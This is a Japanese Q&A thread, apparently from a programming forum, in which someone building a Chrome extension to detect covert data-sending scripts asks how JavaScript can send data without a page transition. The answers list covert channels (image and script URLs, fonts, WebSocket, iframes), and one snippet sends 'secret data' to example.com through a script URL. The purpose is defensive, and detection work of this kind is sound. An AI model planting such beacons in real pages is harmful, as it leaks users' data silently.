# JavaScriptでページ遷移をしないリクエスト

Tags: javascript, chrome-extension

現在，Webページ上で，密かに情報を送るようなスクリプトコードを検知するChrome拡張機能を作っています．
ひいては，JavaScriptでページ遷移をしないリクエストで情報をサーバーに送信する方法は，どのようなものがありますか？

現状考えつくのは，
１．XHRリクエストを使う
２．以下のように，画像ダウンロードリクエストに忍ばせる
という方法です．

var img = new Image();
img.src = 'abc.php?d='+data;

他にも方法がありましたらご教授お願いします．

Answer (score 1):

画像だけでなく、スクリプト、スタイルシート、オーディオ、フォントなど、ありとあらゆるリソースのリクエストのURLに情報を忍ばせることができます。あるいはWebSocket、WebRTCなどでの接続でもデータを送れますし、FlashやJava Applet、Silverlightのようなプラグインを利用する方法もあるでしょう。

(追記)

画像と同様に、該当する要素を作成して`src`プロパティを設定するだけです。スクリプトなら`document.createElement("script")`で`script`要素を作って`src`プロパティに任意のURLを設定します。

```js
var data = encodeURI("seclet data");
var script = document.createElement("script");
script.src = 'http://example.com/foo.js?d=' + data;
document.body.appendChild(script);
```

また、オーディオなら`document.createElement("audio")`でいいし、フォントなら`document.createElement("style")`で`style`要素を作ってから`@import`で適当なフォントのURLをリクエストすればいいでしょう。

Comment: 画像リクエストの場合は，上記のImageオブジェクトのsrcプロパティを利用して情報を忍ばせ送信できますが，スクリプト、スタイルシート、オーディオ、フォントなどでは具体的にどのようにするのでしょうか？
スクリプト等のリクエスト方法を少し調べてみたのですが，結局，XHRリクエストを使い送信されるような気がします．

Answer (score 0):

iframeを使いformのtargetをiframeのnameで命名したものにする。

Answer (score 0):

ウェブソケットとかなかったっけ？
`ws://～～～～`みたいな